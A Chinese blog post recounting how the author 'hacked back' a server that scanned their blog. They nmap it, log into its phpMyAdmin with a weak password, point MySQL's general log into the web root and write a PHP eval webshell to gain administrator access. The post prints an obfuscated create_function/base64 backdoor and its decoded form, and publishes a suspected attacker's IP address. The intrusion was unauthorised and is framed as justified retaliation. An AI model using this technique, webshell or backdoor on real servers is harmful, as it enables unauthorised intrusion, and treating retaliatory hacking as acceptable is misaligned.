记一次反渗透的经历

事情发生在10月9号 发生的很巧，他扫我博客的时候，我正好在测某站的SSRF又正好在请求自己的博客域名，在服务器上看着Web记录。

就看到了这个小伙伴在肆无忌惮的扫我的博客，虽然只是你的扫描器爬到我的站，可万一真被你日下了,那可就尴尬了..

随手百度了一下这个IP想看看是什么地方的，结果显示是新加坡的。感觉是个肉鸡，有搞头。果断nmap跑一波。

访问了一下80  发现hello world 直觉告诉我，他是从web渗透进去的。丢御剑扫了一下文件得到一下结果

访问xiao.php发现文件很大而且从内容可以看出，这是一个phpmyadmin的全局日志文件，突然虎躯一震，难道这个大黑阔就是通过修改全局日志文件路径到WEB目录下然后查询一句话，把一句话写入到文件中从而得到webshell的？

扫到了phpmyadmin 不出意外弱口令成功进入 刚刚上面拿到了网站的绝对路径，想直接写webshell发现失败了

写不出去就算了，赶紧去看看全局变量，证实一下我的猜想。

果然如此。那我也用这种方法拿个webshell

首先修改地址为一个新的文件，他那个文件太大了，写入不好连接，太卡(可以写入生成马，我就是懒。)

这里改成x1a0.php  吧i换成了数字1  免得被他发现了

然后执行查询一句话，把记录写入到日志文件里面

select '<?php eval($_POST[x]);?>';

访问我们的刚刚修改的文件名  成功获得Webshell

 

然后赶紧回去phpmyadmin把日志路径改回去。免得文件过大。

连上去的一瞬间我就感觉肯定是administrator权限，但是看到了cmd.exe这个文件的时候我是一脸懵逼的

不过这趟操作捕获到了一个有意思的脚本。创建时间2015-07-16？？？？

此代码仅可做于安全研究请勿用于非法攻击。

<?php /*1*/$CF/*2*/='c'./*3*/"".'r'./*exit;*/"".'e'./*5*/"".'a'./*6*/"".'t'./*7*/"".'e'./*8*/"".'_'./*9*/"".'f'./*0*/"".'u'./*echo*/"".'n'./*9*/"".'c'./*8*/"".'t'./*7*/"".'i'./*6*/"".'o'./*5*/"".'n';$EB/*die();*/=@$CF/*3*/('','e'.""./*2*/'v'.""./*1*/'a'.""./*0*/'l'.""./*1*/'(b'.""./*2*/'a'.""./*3*/'s'.""./*sleep(1);*/'e'.""./*5*/'6'.""./*6*/'4'.""./*7*/'_'.""./*8*/'d'.""./*9*/'e'.""./*0*/'c'.""./*1*/'o'.""./*2*/'d'.""./*3*/'e'.""./*echo*/'("QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicmJiRfU0VTU0lPTlsndGhlQ29kZSddPSRfUE9TVFsnY29kZSddO2lmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSlAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7"));');$EB/*exit;*/();/*die("FWA");*/ ?>

解密后

<?php 
$CF ='create_function';
$EB=@$CF(eval(base64_decode("@session_start();if(isset($_POST['code']))substr(sha1(md5($_POST['a'])),36)=='222f'&&$_SESSION['theCode']=$_POST['code'];if(isset($_SESSION['theCode']))@eval(base64_decode($_SESSION['theCode']));"));');$EB(); ?>

cmd.exe 不用管他，可能是个正常的cmd也可能是黑阔的远控，虽然想下载下来扔到虚拟机抓个请求，看看他的上线地址。可这几天好迷茫。没时间。

现在webshell的权限是administrator权限可以干很多事情，我下载了网站的日志文件，我像看看这个黑阔的请求IP，继续撸

在日志中看到有三十多个IP扫过这台服务器扫描字典一模一样。  感觉是扫描器，这些IP是肉鸡节点

最早出现的马 sean.php出现在三号，第一个访问IP地址是 59.36.119.227 深圳的小伙伴

我看到最近他还在连接这个shell  我本来打算在服务器上放点东西，并在他的webshell里面加点料的继续撸的…

可这几天都没时间，就不打算继续了。

这几天一直在找区块链安全这方面的资料，在恶补这块。好痛苦，希望有好资料的小伙伴能共享我一份。

对这方面太陌生了，希望找个能一起入坑的小伙伴一起学习区块链安全。